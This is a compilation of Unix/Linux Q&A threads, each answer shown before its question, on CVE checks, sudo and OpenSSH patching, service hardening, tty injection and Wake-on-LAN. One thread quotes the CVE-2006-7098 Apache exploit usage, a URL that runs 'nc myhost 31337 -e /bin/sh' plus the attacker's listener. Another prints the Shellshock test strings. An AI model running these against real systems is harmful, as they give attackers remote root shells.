Debian 12 (bookworm) is vulnerable
Debian 13 (trixie) is fixed
Debian Unstable (sid) is fixed

There is also a note saying that:

[...]
Minor issue; needs specific conditions and forwarding was always subject to caution warning
[...]
Exploitation requires the presence of specific libraries on the victim system.
Remote exploitation requires that the agent was forwarded to an attacker-controlled
system.
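Note that Debian backports security fixes without changing the upstream version banner, so the "8.4p1" that sshd reports tells you nothing by itself; what the security tracker's "fixed in" versions refer to is the Debian package version. A minimal sketch, assuming a dpkg-based system:

```shell
# Print the Debian package version of OpenSSH; compare this against the
# security tracker's "fixed in" version, not the upstream 8.4p1 banner.
if command -v dpkg >/dev/null 2>&1; then
    dpkg-query -W -f '${Package} ${Version}\n' openssh-client 2>/dev/null \
        || echo "openssh-client is not installed"
else
    echo "dpkg is not available on this system"
fi
```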
|
I really really hope I'm wrong here, but it seems that Debian 11 has a vulnerable version of OpenSSH.
My OpenSSH banner reports my OpenSSH version is:
8.4p1 Debian 5+deb11u1
I checked with sshd and it reports the same version.
According to this CVE-2023-38408 ANY version before 9.3p2 is vulnerable.
I tried sudo apt update && sudo apt full-upgrade but it did not update the OpenSSH version.
|
Are all Debian 11 systems automatically vulnerable to CVE-2023-38408?
|
What you are asking for sounds to me like writing standard monitoring scripts.
The best way to approach it is to settle on one programming language and use it to write them all.
Bash scripting is not the best choice: it can do a lot, but it is flaky for some operations, messy to maintain because of its reliance on assorted external binaries, and its error handling is nowhere near as convenient as exception handling in other languages.
I'd recommend one of the JVM languages (Java, Scala, Groovy), which have drivers for every database and most other services. C# is also a good choice, with comparable library coverage.
Failing that, Python, PHP, or Perl also offer plenty of drivers and APIs.
Take this subject seriously, as it is one of the most important things, and ensure proper tests for every service.
Since you are only writing the checks themselves, you can use any existing network-monitoring front-end, such as Nagios with Thruk, to handle scheduled execution, notifications, and reporting.
Moreover, you can graph metrics with pnp4nagios.
Also note that vulnerability scanning and monitoring are two different things. For the former you have OpenVAS and Nessus; for the latter, Nagios, SolarWinds, and others. What you want is custom scripts run by something like Nagios.
This is also a very good way to learn programming: the scripts are simple, so you can learn a lot without much pressure. Dedicate two or three hours per day and you will gain deep insight into your infrastructure. Start with Eclipse or IntelliJ and use Gradle to build simple projects; with Gradle's automation and Java's good tooling you should be happy in the long term, and you can ask the dev team for help. Check the Nagios plugin documentation for the strings a plugin should return so that pnp4nagios can draw graphs.
Ingesting logs into a database is also very helpful.
Now some more practical details. You can run the Java mini-programs (Nagios plugins) remotely, or run them locally on the Nagios machine (preferred). In the local case you ssh (from Java or Python) to the target system, read the file, download it, and parse it, so some scenarios involve network operations.
You can also use Cloud APIs.
And you can use SNMP with existing Nagios plugins, so you don't need Java for everything.
Some databases can be monitored with dedicated solutions: if you don't want to script everything manually (for which Nagios is the best fit), you can find tools on the web that monitor your DB performance.
Finally, monitoring scripts are a perfectly normal way to check that your database has a password, and that it isn't running out of RAM, disk space, and so on.
And here is how this can be done properly:

1. A database of your infrastructure (all hosts and so on), possibly with automated detection, linked to your build/automation infrastructure. This can be more than one database if you use a cloud.
2. Another database for logs and other documents, containing the Nagios execution log and the results from the scripts in (4). You can ingest any other logs here too; MongoDB would be a good fit, and Cassandra can do it as well.
3. Nagios:
   - a check that looks into database (2) to see whether the background checks ran successfully and what they found;
   - a check that the background script itself is running, based on the logs in database (2).
4. Background scripts running password/access checks:
   - verify that no system from database (1) has an empty or default root password;
   - verify that every system from database (1) allows the expected logins;
   - ingest the results and logs into database (2);
   - optionally run OpenVAS and ingest its results into (2) as well.

As a result, you can then fix the build (1), or the servers listed in (1), whenever a default or missing password turns up. You can also make the build (1) generate the Nagios checks and metrics, and you can run several Nagios instances. Database (2) can ingest logs from various sources (you'd need adapters for this); based on those logs you can see what is being brute-forced and tune your policies.

Also, Nessus and OpenVAS are huge resource hogs, and neither is good at checking for default or missing passwords. Nagios with dedicated per-host checks is the easy and effective way, and a dedicated script is the better way to solve this particular problem.
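To make the plugin contract concrete: a Nagios-style check is just a program that prints one status line (optionally followed by |-separated perfdata, which pnp4nagios graphs) and exits 0/1/2 for OK/WARNING/CRITICAL. A minimal sketch with a made-up metric and hypothetical thresholds:

```shell
# Minimal Nagios-style check: one status line plus perfdata after '|'.
# Exit code 0=OK, 1=WARNING, 2=CRITICAL. Thresholds here are examples.
check_disk_pct() {
    used=$1 warn=$2 crit=$3
    if [ "$used" -ge "$crit" ]; then
        echo "CRITICAL - disk ${used}% used|used=${used}%"; return 2
    elif [ "$used" -ge "$warn" ]; then
        echo "WARNING - disk ${used}% used|used=${used}%"; return 1
    else
        echo "OK - disk ${used}% used|used=${used}%"; return 0
    fi
}

check_disk_pct 42 80 90
```

The same contract applies whatever language you write the checks in; a Java or Python plugin only needs to produce the same output line and exit code.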
|
I need to write some kind of bash script that would check the conf files of services (commonly used ones such as nginx, apache, mongodb, cassandra, ssh, etc.) and search for patterns (i.e. check that mongod.conf has the authorization: enabled line, check that ssh key-based login is enabled, check that every service is at its newest version, disable default users) to be sure that each service is safe.
But here's one problem I can't solve (yet ;)) - I need to prove that my script works. Do you know any application that would check for vulnerabilities of commonly used services? I don't mean websites - services. I could perform that test before running my script and after, and then - voila - my script is saving the world ;)
I would be really thankful for any answer.
Thank you so much :3
|
Check service for vulnerabilities [closed]
|
I wrote this script, and my official guide is available here. The simplest solution is to upgrade to the latest Nmap (version 6.47 as of this writing).
|
Wanting to setup Nmap on my Ubuntu 14.04 LTS system to detect HeartBleed vulnerability. I followed the instructions here:
http://cyberarms.wordpress.com/2014/04/20/detecting-openssl-heartbleed-with-nmap-exploiting-with-metasploit/
To create the script files and place them in the proper directory. However the script throws an execution error.
<error>
|_ssl-heartbleed: ERROR: Script execution failed (use -d to debug)
</error>

So I ran it with -d to debug and got this:
<error>
NSE: Starting ssl-heartbleed against "testsite".com (IP Address:443).
Initiating NSE at 08:28
NSE: ssl-heartbleed against testsite.com (IP Address:443) threw an error!
/usr/bin/../share/nmap/scripts/ssl-heartbleed.nse:77: variable 'keys' is not declared
stack traceback:
[C]: in function 'error'
/usr/bin/../share/nmap/nselib/strict.lua:80: in function '__index'
/usr/bin/../share/nmap/scripts/ssl-heartbleed.nse:77: in function 'testversion'
/usr/bin/../share/nmap/scripts/ssl-heartbleed.nse:232: in function </usr/bin/../share/nmap/scripts/ssl-heartbleed.nse:205>
(...tail calls...) Completed NSE at 08:28, 0.01s elapsed

The host I scanned sits on public IP space, so I know it's not a firewall issue. I am also the owner of the script files and have execute permission on them.
|
Nmap script execution to detect heartbleed is failing
|
So, after rereading the exploit info several times, I've certain doubts about the phrase local attacker: does it mean that the vulnerability can only be exploited from the same machine where the vulnerable Apache is running? In that case I understand that the attacker should have a priori the credentials of a valid user in the machine with permissions to manage the apache (which would reduce a lot the applicability of the attack).

Yes, you're right. Actually, webserver is the target server with that vulnerability, and myhost is the attacker's machine.
By placing the cgipwn binary in webserver's /cgi-bin directory and opening http://webserver/cgi-bin/cgipwn?..., the attacker attempts to execute nc myhost 31337 /bin/sh on webserver, as the user who started Apache (usually root).
The attacker previously runs nc -vvv -l -p 31337 on myhost so that it can accept that nc connection from webserver. If everything goes well, the attacker gets an interactive /bin/sh session on webserver, running as the user who started Apache.
|
I'm studying the vulnerabilities of an old version of Apache, the 1.3.34. And I don't quite understand in what exact situation the CVE 2006-7098 vulnerability can be exploited. The README included in the exploit states that:Local attacker can influence Apache to direct commands
into an open tty owned by user who started apache process, usually root.
This results in arbitrary command execution. Notes: Must have CGI execution privileges and service started manually by root via shell.
Usage: nc -vvv -l -p 31337
http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d

At the beginning I understood that the vulnerability could be exploited from another machine on the same network as the vulnerable server. So from this other machine (the attacker) I:

- compiled the cgipwn exploit and installed it in the cgi-bin of the attacker machine's Apache.
- executed the nc command from the attacker machine, specifying -p as the port where the attacker's Apache listens, webserver as the attacker machine's IP, and myhost as the server with the vulnerability.

But I've not succeeded: the command just doesn't return anything.
So, after rereading the exploit info several times, I've certain doubts about the phrase local attacker: does it mean that the vulnerability can only be exploited from the same machine where the vulnerable Apache is running? In that case I understand that the attacker should have a priori the credentials of a valid user in the machine with permissions to manage the apache (which would reduce a lot the applicability of the attack).
Could any body shed some light on this?
|
Does CVE 2006-7098 require access (being a logged in) to the vulnerable Debian?
|
CVE-2021-3156 is fixed by sudo 1.8.27-1+deb10u3.
Both CVE-2021-23239 and CVE-2021-23240 are mitigated by fs.protected_symlinks, which is set to 1 by default in Debian 10: this setting only allows symlinks to be followed if they are outside a sticky world-writable directory (such as /tmp), or when the uid of the symlink and follower match, or when the directory owner matches the symlink’s owner. CVE-2021-23240 additionally only affects systems using SELinux, which isn’t the default in Debian.
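You can verify on your own system that the fs.protected_symlinks mitigation is active; a quick sketch:

```shell
# A value of 1 (or higher) means symlink following in sticky world-writable
# directories such as /tmp is restricted, mitigating CVE-2021-23239/23240.
val=$(cat /proc/sys/fs/protected_symlinks 2>/dev/null || echo "unknown")
echo "fs.protected_symlinks=$val"
```

The same value can also be read or set with sysctl fs.protected_symlinks.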
|
On Linux Mint 20.1 Ulyssa, I have received a security update to patch two security flaws leading to a local privilege escalation without password for all unpatched sudo versions before 1.9.5, and here is a part of the changelog:

sudo (1.8.31-1ubuntu1.2) focal-security; urgency=medium

  * SECURITY UPDATE: dir existence issue via sudoedit race
- debian/patches/CVE-2021-23239.patch: fix potential directory existing
info leak in sudoedit in src/sudo_edit.c.
- CVE-2021-23239
* SECURITY UPDATE: heap-based buffer overflow
- debian/patches/CVE-2021-3156-pre1.patch: sanity check size when
converting the first record to TS_LOCKEXCL in
plugins/sudoers/timestamp.c.
- debian/patches/CVE-2021-3156-1.patch: reset valid_flags to
MODE_NONINTERACTIVE for sudoedit in src/parse_args.c.
- debian/patches/CVE-2021-3156-2.patch: add sudoedit flag checks in
plugin in plugins/sudoers/policy.c.
- debian/patches/CVE-2021-3156-3.patch: fix potential buffer overflow
when unescaping backslashes in plugins/sudoers/sudoers.c.
- debian/patches/CVE-2021-3156-4.patch: fix the memset offset when
converting a v1 timestamp to TS_LOCKEXCL in
plugins/sudoers/timestamp.c.
- debian/patches/CVE-2021-3156-5.patch: don't assume that argv is
allocated as a single flat buffer in src/parse_args.c.
- CVE-2021-3156 -- Marc Deslauriers <[emailprotected]> Tue, 19 Jan 2021 09:21:02 -0500

But on Debian Buster I have received only one update for the sudo package.
On debian sudo --version : 1.8.27-1+deb10u3
but on linux mint: sudo --version : 1.8.31-1ubuntu1.2
Sudo versions affected:

Sudo versions 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1 are affected.

The Qualys security paper states:

Successful exploitation of this vulnerability allows any unprivileged user to gain root privileges on the vulnerable host. Qualys security researchers have been able to independently verify the vulnerability and develop multiple variants of exploit and obtain full root privileges on Ubuntu 20.04 (Sudo 1.8.31), Debian 10 (Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2). Other operating systems and distributions are also likely to be exploitable.

Until a security update is uploaded, is there any way to harden Debian to avoid exploitation of the two security flaws CVE-2021-23239 and CVE-2021-3156?
|
How to patch sudo vulnerabilities on debian leading to a local privilege escalation CVE-2021-23239 and CVE-2021-3156 (aka Baron Samedit)?
|
This question really amounts to: what does a distribution do?
A distribution adapts and integrates packages into the overall system: PATH, manuals, init scripts, logs, cron jobs, firewall rules, and so on. It also configures each package to work with specific other packages (which crypto library version, which random generator to use, etc.), and it adapts the default configuration files.
So the distribution binaries contain many changes, plus additional testing.
The upstream project provides the sources and the functionality, and you can take the original sources and compile them yourself, but then you need to read all the original documentation on how to compile and install the program. The "Linux patch" is meant to be applied to those original sources.
If you know some programming, you can download your distribution's sources, apply the patch, and build and install the modified packages. Remember to modify the changelog or the build command to add a local version suffix, so you can tell whether you have the original or the patched version.
Being able to do this is one of the strengths of open source, but I would not try it for the first time on important programs.
|
I run multiple distributions of Linux. I am researching how to patch against KRACK.
The package that is vulnerable in Linux is 'wpa_supplicant'.
According to the Vendor Responses the "Linux patch" for wpa_supplicant can be found here, whereas the (for example) Fedora patch can be found here and the Debian patch can be found here.
In which circumstances would/could I download and apply the so called "Linux patch" directly? Is that only if I'm using the Linux Kernel directly? Otherwise, if I'm running on a specific distribution of Linux, do I need to wait for a patch from that specific distribution?
Note my question refers to a specific vulnerability (KRACK), but I'm trying to understand generally, what is the difference between what the project puts out (in this case the hostapd and wpa_supplicant project) versus what the different Linux distributions release.
|
Is a package specific to a Linux distribution? How to protect against KRACK
|
Yes, a process can inject input into a tty via the TIOCSTI ioctl. At least on Linux, that's subject to some restrictions: the user should be root (CAP_SYS_ADMIN) or inject into its controlling tty.
That's still quite dangerous, and TIOCSTI was gutted in systems like OpenBSD, but its threat model was usually the reverse of the one in your question: root was supposed to use su (or something else) to run a command as an ordinary user, and that command was able to insert keys into the controlling tty it was sharing with its privileged caller. See examples here and here.
Of course, this could also be exploited via biff(1) or some other program running in the same tty that su root was started from, but that doesn't look very interesting: if an attacker managed to get hold of an account able to su or sudo, there are probably simpler and nicer ways to escalate it.
|
I need some information regarding the possible attack vector on *nix platforms of running su/sudo.
Can an malicious process wait for the user to run su or sudo and then exploit that root access somehow? Or is this already protected somehow?
For example, if /dev/tty2 has impersonated root with su:
# inject text
echo Adding malicious text to a root tty, like Enter Password: > /dev/tty2
# read keystrokes
cat /dev/tty2
# not sure how to write keystrokes or if it is possibleMaybe this is absolutely documented, or protected, if so, please link me the docs.
PS: Please don't shut me down as if I am requesting help to do an exploit. I am not. The question is about the risks of using su/sudo versus logging as root in the context of a discussion about whether should Windows have a sudo command or not. I need to get my facts straight.
|
Can a process send keystrokes or read text to/from a tty that is running su/sudo?
|
Following the comments, I have done this, and am satisfied that I am up to date.
[Harry@localhost]~% rpm -qv bash
bash-4.2.48-2.fc20.i686
[Harry@localhost]~% env X='() { (a)=>\' sh -c "echo date"; cat echo
date
cat: echo: No such file or directory
[Harry@localhost]~%
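For completeness, the transcript above exercises the CVE-2014-7169 follow-up bug; the companion one-liner for the original CVE-2014-6271 bug is the well-known test below. A patched bash prints only the test line, while a vulnerable one also prints "vulnerable":

```shell
# CVE-2014-6271 check: an exported "function" definition with a trailing
# command. A patched bash treats x as a plain variable and never runs
# the trailing "echo vulnerable".
env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'
```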
|
The question on this site: "When was the shellshock (CVE-2014-6271/7169) bug introduced, and what is the patch that fully fixes it?" explains how the vulnerability has been cured, but does not, as far as I can see, explain what is necessary for individuals to do on their own computers. Is there any need for further action if yum -y update bash gives No packages marked for update.?
|
Is there any need to take further action over ShellShock [closed]
|
You might have better luck using the tool arping instead. The tool ping works at the layer 3 level of the OSI model, whereas arping works at layer 2.
With this tool, however, you still need to know the system's IP. There are two versions of it: the standard one included with most Unixes (Alexey Kuznetsov's) can only deal with IP addresses, while the other version (Thomas Habets') supposedly can query using MAC addresses.
$ sudo arping 192.168.1.1 -c 1
ARPING 192.168.1.1 from 192.168.1.218 eth0
Unicast reply from 192.168.1.1 [00:90:7F:85:BE:9A] 1.216ms
Sent 1 probes (1 broadcast(s))
Received 1 response(s)

arping works similarly to ping, except that instead of sending ICMP packets, it sends ARP packets.
Getting a system's IP using just the MAC
Here are a couple of methods for doing the reverse lookup of MAC to IP.

nmap
$ nmap -sP 192.168.1.0/24
Then look in your arp cache for the corresponding machine: arp -an.

fping
$ fping -a -g 192.168.1.0/24 -c 1
Then look in your arp cache, same as above.

ping
$ ping -b -c1 192.168.1.255
Then look in your arp cache, same as above.

nbtscan (Windows-only hosts)
$ nbtscan 192.168.1.0/24

Doing NBT name scan for addresses from 192.168.1.0/24

IP address       NetBIOS Name     Server        User          MAC address
------------------------------------------------------------------------------
192.168.1.0 Sendto failed: Permission denied
192.168.1.4 MACH1 <server> <unknown> 00-0b-12-60-21-dd
192.168.1.5 MACH2 <server> <unknown> 00-1b-a0-3d-e7-be
192.168.1.6 MACH3 <server> <unknown> 00-21-9b-12-b6-a7
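All of the "then look in your arp cache" steps can be scripted. A sketch (the helper name find_ip_for_mac is mine) that filters ip neigh or arp -an style output for a given MAC:

```shell
# Print the first IP whose neighbour-cache entry contains the given MAC.
# Feed it the output of "ip neigh" or "arp -an" after sweeping the subnet.
find_ip_for_mac() {
    awk -v m="$1" 'tolower($0) ~ tolower(m) { print $1; exit }'
}

# Example with canned "ip neigh" output; a real run would be something like:
#   ping -b -c1 192.168.1.255 >/dev/null 2>&1
#   ip neigh | find_ip_for_mac 00:0b:12:60:21:dd
printf '192.168.1.4 dev eth0 lladdr 00:0b:12:60:21:dd REACHABLE\n' \
    | find_ip_for_mac 00:0b:12:60:21:dd
```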
|
I have an NIC card on a Debian machine somewhere. The machine is turned off, but I need to know whether the NIC card is turned on so that I can send a wake-on-lan magic packet later (from another Debian machine) to wake it up. I have the MAC address of the card. Is there any way I can ping the ethernet card by MAC to see whether it is on?
I tried creating an ARP entry:
arp -s 192.168.2.2 00-0c-0d-ef-02-03
ping 192.168.2.2

That didn't work, since the NIC card does not have this IP address. So the NIC card would receive the ping request but would not reply to it. Is there any way around this?
I am using the etherwake package to send a wake-on-lan message.
|
Can one ping a NIC by MAC
|
Sending a single packet and waiting for a response is going to be one of the fastest possible ways, and ping is a fine way to do that. In fact, depending on your use case, I'd argue that it's too fast, since it doesn't really tell you if the system is actually doing anything useful, just that the kernel's network subsystem is alive and configured.
But assuming that's good enough, you can make some improvements. First, you could use -W1 to decrease the ping timeout to one second. Second, you could make your script ping the different hosts asynchronously (in a background thread), and check the results as needed rather than waiting.
Alternately, you can re-think the approach and have the remote systems check in somehow when they're up, and if a system hasn't checked in, you can assume it's down.
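The two improvements can be sketched directly in shell: each ping runs in its own subshell with a 1-second timeout, so the total wait is roughly one second however many hosts are down. The addresses below are unroutable TEST-NET placeholders standing in for your lab machines:

```shell
# Ping several hosts in parallel, each with a 1-second timeout (-W1).
# 192.0.2.x are documentation-only addresses and will never answer.
for h in 192.0.2.1 192.0.2.2 192.0.2.3; do
    (
        if ping -c1 -W1 "$h" >/dev/null 2>&1; then
            echo "$h up"
        else
            echo "$h down"
        fi
    ) &
done
wait
```

In your script you would substitute the hostnames pulled from the sqlite db and collect the up/down lines as they arrive.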
|
I'm writing a wake on lan script for a set of our lab computers. We have sqlite db with a list of the computer hostnames, IPs, and MACs and currently I ping each of them with '-c1' so it doesn't run endlessly - but even that takes some waiting, is there a quicker way to get answer rather than ping? Using ping seems to slow the script quite a bit as it needs the ping answers to continue.
Thanks much for any suggestions!
|
Faster way than ping for checking if computer online?
|
ethtool will help you, but the hardware must support what you need.

# ethtool interface | grep Wake-on

# ethtool eth0 | grep Wake-on
        Supports Wake-on: pumbag
        Wake-on: d

According to ArchLinux's wiki, the Wake-on values define what activity triggers wake-up:

d (disabled)
p (PHY activity)
u (unicast activity)
m (multicast activity)
b (broadcast activity)
a (ARP activity)
g (magic packet activity)

If you need some sort of "Wake-on-incoming-SSH", try
# ethtool -s interface wol u
|
I have been using Wake-on-LAN successfully for many years now for a number of my Linux devices. It works well enough.
However, I also have a Mac Mini at home. I have noticed that it goes to sleep and, while asleep, has two distinct properties that none of my Linux machines share:

- It still responds to ping on the network.
- It will wake up automatically upon an incoming ssh connection, no Wake-on-LAN required.

This second property ends up being really nice: it automatically goes to sleep and saves power when not in use, and doesn't require any extra thought to power on when I want to ssh into it. It just wakes up automatically. And after I've logged out, 15 minutes later it will go to sleep again.
My assumption is this is because Apple controls the hardware and software stack. So while industry-wide Wake-on-LAN is a network device feature based on a magic packet (that requires no OS interaction), Mac's magic "wake-on-LAN and also still respond to pings" is because they haven't actually put the whole OS to sleep and/or have a separate network stack still running in sleep mode. But that's just a guess.
I'm curious if anyone has ever seen or implemented this sort of "Wake-on-incoming-SSH" on a Linux machine? Or is this special magic that can be found only on Apple devices where they control hardware-through-software and can do this in a way the rest of the industry can't?
|
Wake-on-LAN via SSH
|
OS X can do this now, as of Snow Leopard. It's made possible through the Sleep Proxy Service. It's pretty much automatic. The only requirement is that you have a second always-on Apple device on your LAN that can act as the sleep proxy. Their current low-power embedded boxes all support this, I believe: Airport, Time Machine, and Apple TV.
In the general case, though, I believe the answer is no. I'm not aware of any other OS that has implemented a service like this. The technology is open source, so there's no reason this couldn't be everywhere eventually. It's probably too new to see widespread adoption just yet.
You might now be asking, why do you need a second Apple box on the LAN?
When a PC is asleep, the kernel — and therefore the network stack — is not running, so there is no code in your OS that can respond to a "magic" packet of the sort you're wishing for.
Wake-on-LAN magic packets aren't handled by the OS. They're recognized by the network interface IC, which responds by sending a signal to the CPU that releases it from the sleep state. It can do this because the IC remains powered up in some sleep states. (This is why the Ethernet link light stays on while a PC is "off" on some machines.)
The reason the Apple technology works is that just before the PC goes to sleep, it notifies the sleep proxy. The sleep proxy then arranges to temporarily accept traffic for the sleeping machine, and if it gets something interesting, it sends a WOL packet to the PC and hands off the traffic it received.
|
I'm looking into installing a file server on my network, for serving data and backups.
I want this machine to be available at all times, but I would rather not keep it on all the time (as to conserve power).
Is it possible to set things up so that the thing automatically suspends (or powers off) after some time and then automatically powers back on when I try to connect to it (using some wake-up on LAN magic, without having to send explicit WOL packets)?
|
How to power off a system but still keep it available on the network
|
socat is a killer utility. Put this somewhere in your init scripts:
socat -u -T1 UDP-LISTEN:1234,fork,range=<ip address of source>/32 UDP-DATAGRAM:255.255.255.255:5678,broadcastSome users have problems with UDP-LISTEN, so using UDP-RECV seems better (warning: could send the broadcast packets in an endless loop):
socat -u UDP-RECV:1234 UDP-DATAGRAM:255.255.255.255:5678,broadcast

- fork allows socat to keep listening for subsequent packets.
- T1 limits the life of forked subprocesses to 1 second.
- range makes socat listen only to packets coming from this source. Assuming this is a different computer from the one where socat is running, it keeps socat from listening to its own broadcast packets, which would result in an endless loop.
- 255.255.255.255 is more general than 192.168.0.255, letting you copy-paste without thinking about your current network structure. Caveat: this probably sends the broadcast packets out of every interface.

Like you, I noticed that WOL works with any port; I wonder how reliable that is, since most documents only talk about ports 0, 7, and 9. It does allow using a non-privileged port, so you can run socat as user nobody.

Thanks to @lgeorget, @Hauke Laging, and @Gregory MOUSSAT for contributing to this answer.
|
We need to wake-up some computers on our internal LAN, from the Internet.
We have a somewhat closed router, with very few ways to configure it.
I'd like to use netfilter (iptables) to do this because it doesn't involve a daemon or similar, but other solutions are okay.
What I have in mind:

- the external computer issues a WOL (Wake-On-LAN) packet to the public IP address (with the correct MAC inside)
- the correct port is open on the router (say 1234), redirecting the data to a Linux box
- the Linux box transforms the UDP unicast packet into a broadcast packet (exact same content, only the destination address is modified to 255.255.255.255 or 192.168.0.255)
- the broadcast packet reaches every NIC, and the desired computer is now awake

For that, a very simple netfilter rule is:
iptables --table nat --append PREROUTING --in-interface eth+ --protocol udp --destination-port 1234 --jump DNAT --to-destination 192.168.0.255
Alas netfilter seems to ignore transformation to broadcast. 192.168.0.255 and 255.255.255.255 gives nothing. Also tested with 192.168.0.0 and 0.0.0.0
I used tcpdump to see what happens:
tcpdump -n dst port 1234
13:54:28.583556 IP www.xxx.yyy.zzz.43852 > 192.168.0.100.1234: UDP, length 102
and nothing else. I should have a second line like:
13:54:28.xxxxxx IP www.xxx.yyy.zzz.43852 > 192.168.0.255.1234: UDP, length 102
If I redirect to a non-broadcast address, everything is okay: I get the 2 expected lines. But obviously this doesn't work for WOL.
Is there a way to tell netfilter to issue broadcast packets?
Other methods I think about:
use iptables to match the desired packets, log them, and use a daemon to monitor the log file and fire the broadcast packet
use iptables to redirect the desired packets to a local daemon, which fires the broadcast packet (simpler)
use socat (how?)
|
Transform a UDP unicast packet into a broadcast?
|
You need something that's capable of sending an Ethernet packet that will be seen by the device you want to wake up.
The ether-wake command in BusyBox is exactly what you're after. If your BusyBox doesn't have it, consider recompiling BusyBox to include it.
If you have a sufficiently “bloaty” netcat (BusyBox can have one of two nc implementations, one of which handles TCP only), you can send a manually crafted UDP packet to the broadcast address of the network segment that the device is connected to.
mac=$(printf '\xed\xcb\xa9\x87\x65\x43') # MAC = ed:cb:a9:87:65:43
wol_packet=$(printf "\xff\xff\xff\xff\xff\xff$mac$mac$mac$mac$mac$mac$mac$mac$mac$mac$mac$mac$mac$mac$mac$mac")
echo "$wol_packet" | nc -u 192.0.2.255 7
Another BusyBox utility that you could abuse into sending that packet is syslogd.
syslogd -n -O /dev/null -l 0 -R 192.0.2.255/7 &
syslogd_pid=$!
logger "$wol_packet"
kill $syslogd_pid
If the MAC contains a null byte, you won't be able to craft the packet so easily. Pick a byte that's not \xff and that's not in the MAC, say \x42 (B), and pipe through tr.
echo "$wol_packet" | tr B '\000' | nc -u 192.0.2.255 7
If you really have bash (which is extremely unusual on devices with BusyBox — are you sure you really have bash, and not another shell provided by BusyBox?), it can send UDP packets by redirecting to /dev/udp/$hostname/$port.
echo "$wol_packet" >/dev/udp/192.0.2.255/7
|
Is it possible to implement the wake-on-lan magic packet in bash? I'm using an old, customized BusyBox and don't have ether-wake. Is it possible to replace it with some other shell command, like:
wakeonlan 11:22:33:44:55:66
|
Wake-on-LAN with BusyBox?
|
A WoL magic packet can be sent either to UDP port 0, 7, or 9 (depending on the hardware in use) or as a raw Ethernet packet of type 0x0842. wolcmd has elected to use the former method, defaulting to port 7.
Note that wolcmd does support UDP broadcast, meaning that you can specify 255.255.255.255 as the address and mask if your hardware and network support IP broadcasts. The magic packet will only be interpreted by the machine whose MAC address it contains; all others will ignore it.
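For reference, the payload wolcmd sends is easy to construct by hand: 6 bytes of 0xFF followed by 16 repetitions of the target's 6-byte MAC, 102 bytes in total. A minimal shell sketch (the MAC is a made-up example, and this relies on printf understanding \x escapes, as bash's builtin and coreutils printf do):

```shell
# Build a WOL magic packet for the example MAC ed:cb:a9:87:65:43:
# 6 bytes of 0xFF, then the 6-byte MAC repeated 16 times (102 bytes total).
mac='\xed\xcb\xa9\x87\x65\x43'
{
  printf '\xff\xff\xff\xff\xff\xff'
  for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16; do
    printf "$mac"
  done
} > /tmp/magic.bin
wc -c < /tmp/magic.bin   # prints 102
```

Any tool that can emit those 102 bytes in a UDP datagram to the broadcast address can play the role of wolcmd.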
|
I have a new GNU/Linux Debian 9 server installation.
This is what I get from ethtool:
root@web-server:~# ethtool enp2s0
Settings for enp2s0:
Supported ports: [ TP MII ]
Supported link modes: 10baseT/Half 10baseT/Full
100baseT/Half 100baseT/Full
1000baseT/Half 1000baseT/Full
Supported pause frame use: No
Supports auto-negotiation: Yes
Advertised link modes: 10baseT/Half 10baseT/Full
100baseT/Half 100baseT/Full
1000baseT/Half 1000baseT/Full
Advertised pause frame use: Symmetric Receive-only
Advertised auto-negotiation: Yes
Link partner advertised link modes: 10baseT/Half 10baseT/Full
100baseT/Half 100baseT/Full
1000baseT/Full
Link partner advertised pause frame use: Symmetric Receive-only
Link partner advertised auto-negotiation: Yes
Speed: 1000Mb/s
Duplex: Full
Port: MII
PHYAD: 0
Transceiver: internal
Auto-negotiation: on
Supports Wake-on: pumbg
Wake-on: g
Current message level: 0x00000033 (51)
drv probe ifdown ifup
Link detected: yes
So, you see the Magic Packet option is on (Wake-on: g). I am waking this computer from the power-off state like this:
./wolcmd 00********** 192.168.0.104 255.255.255.0 7 # I've hidden the MAC address here
from Cygwin on Windows 10 using Depicus Wake On Lan Command Line. What I do not understand is: why do I need to specify the IP address and mask, or the port number?
Why is the MAC address not enough? Could anyone elaborate?
|
Why am I required to use an IP address when Waking-on-LAN a computer?
|
You can check the setting for an interface, say eth0, with ethtool:
$ sudo ethtool eth0 | grep Wake
Supports Wake-on: pumbg
Wake-on: g
From the ethtool man page, you can disable it with:
$ sudo ethtool -s eth0 wol d
Where this gets configured depends on what you use to start your network.
The Arch Linux wiki gives some examples (for turning it on, but the reverse should be clear) for netctl, systemd, nmcli (NetworkManager), and udev.
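For instance, on a system where links are configured by systemd, a .link file is one place to persist the setting. This is only a sketch: the file name is arbitrary and the MAC is a placeholder to match your interface.

```
# /etc/systemd/network/50-wol-off.link
[Match]
MACAddress=aa:bb:cc:dd:ee:ff

[Link]
WakeOnLan=off
```

systemd-udevd applies WakeOnLan= when the link appears, so the setting survives reboots without any extra ethtool invocation.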
|
Windows also has Wake on Lan that allows a computer to be woken up from sleep; additionally, this can be disabled by a user on said computer.
I know that WoL exists on Linux, but how does one disable it?
|
How to disable Wake on Lan
|
Manually testing using etherwake
I think you can test it using a tool like etherwake. Depending on the distro, it's called etherwake (Ubuntu/Debian) or ether-wake (RHEL/CentOS/Fedora). I had it installed by default on Fedora; it's part of the net-tools package.
To use it:
# Redhat
$ ether-wake 00:11:22:33:44:55
# Debian/Ubuntu
$ etherwake 00:11:22:33:44:55
To confirm that a server supports WOL:
$ ethtool eth0
Settings for eth0:
Supported ports: [ ]
Supported link modes:
Supports auto-negotiation: No
Advertised link modes: Not reported
Advertised auto-negotiation: No
Speed: 100Mb/s
Duplex: Full
Port: MII
PHYAD: 1
Transceiver: internal
Auto-negotiation: off
Supports Wake-on: g
Wake-on: g
Link detected: yes
The "Supports Wake-on: g" and "Wake-on: g" lines tell you that the card is configured for WOL support. If the latter is missing, you can add it to the ifcfg-eth0 config file like so:
ETHTOOL_OPTS="wol g"
Using hwinfo
I noticed that if you look through the hwinfo output there are messages regarding how the system came out of power-save mode. There are also messages related to the Ethernet device coming up. For example:
<6>[721194.499752] e1000e 0000:00:19.0: wake-up capability disabled by ACPI
<7>[721194.499757] e1000e 0000:00:19.0: PME# disabled
<7>[721194.499831] e1000e 0000:00:19.0: irq 46 for MSI/MSI-X
<6>[721194.574306] ehci_hcd 0000:00:1a.0: power state changed by ACPI to D0
<6>[721194.576330] ehci_hcd 0000:00:1a.0: power state changed by ACPI to D0
Here are some other messages a little while later:
<6>[721197.226679] PM: resume of devices complete after 3162.340 msecs
